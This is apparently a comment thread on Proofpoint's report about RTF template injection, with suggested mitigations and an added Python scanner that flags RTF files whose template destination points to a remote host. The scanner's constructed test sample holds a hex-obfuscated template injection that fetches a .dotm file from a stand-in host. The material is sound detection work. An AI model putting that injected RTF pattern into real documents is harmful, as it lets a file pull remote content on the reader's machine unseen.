December 1, 2021 Proofpoint: Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
And what about if you simply block MS Word or any other document reader from making outbound connections, will this attack still work?
How about blocking .rtf attachments altogether unless there is a valid business reason? Users could request the attachment to be released from quarantine and IT admins could analyze the file before releasing it. I am wondering how EOP fares with this method of attack. Alternatively there are other mitigating factors / tools:
1. Tools like Second Chance (from KnowBe4) can stop users from going to dodgy links, as a warning pops up showing the actual link where the user will be taken and asking them if they want to continue.
2. IDS / IPS software running on your network might catch that type of traffic and stop it.
3. A good EDR tool can also prevent such attacks from executing.
4. Disabling macros and active content from Word.
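An added example, not from the Proofpoint article or either comment, of the kind of check a quarantine workflow like the one proposed above could run on a held .rtf attachment: it extracts the file's \*\template destination (the control word the injection technique abuses) and flags any destination that points off-host. The two sample documents and the example.invalid URL are constructed for the demo.

```python
import re

# Constructed samples, not real malware: a plain RTF and one whose
# \*\template destination points at a remote URL (the injection pattern).
BENIGN_RTF = rb"{\rtf1\ansi{\fonttbl{\f0 Arial;}}\f0 Quarterly report\par}"
INJECTED_RTF = (rb"{\rtf1\ansi{\*\template \'68ttp://example.invalid/t.dotm}"
                rb"\f0 Quarterly report\par}")

# {\*\template <destination>} where <destination> runs to the closing brace.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\b([^{}]*)\}", re.IGNORECASE)
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# Anything that makes Word reach another host when the file opens:
# a URL scheme (http://, https://, ftp://, ...) or a UNC path (\\host\share).
REMOTE_RE = re.compile(rb"^(?:[a-z][a-z0-9+.-]*://|\\\\)", re.IGNORECASE)


def _decode_rtf_text(raw: bytes) -> bytes:
    """Resolve \\'hh hex escapes, a common way to hide the URL from grep."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes.fromhex(m.group(1).decode()), raw)


def template_destinations(data: bytes) -> list[bytes]:
    """Return every template destination string found in the RTF bytes."""
    return [_decode_rtf_text(m.group(1)).strip().strip(b'"')
            for m in TEMPLATE_RE.finditer(data)]


def is_remote(destination: bytes) -> bool:
    """True for URLs and UNC paths; False for local paths like C:\\..."""
    return REMOTE_RE.match(destination) is not None


def scan_rtf(data: bytes) -> dict:
    """Summarise what a mail gateway or quarantine reviewer wants to know."""
    dests = template_destinations(data)
    remote = [d for d in dests if is_remote(d)]
    return {
        "is_rtf": data.lstrip().startswith(b"{\\rtf"),
        "template_destinations": dests,
        "remote_template": bool(remote),
        "remote_destinations": remote,
    }


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_RTF), ("injected", INJECTED_RTF)):
        print(name, scan_rtf(doc))
```

A verdict of remote_template=True is a reason to keep the file in quarantine even if the outbound connection itself would be blocked, since the document was built to fetch something it should not need.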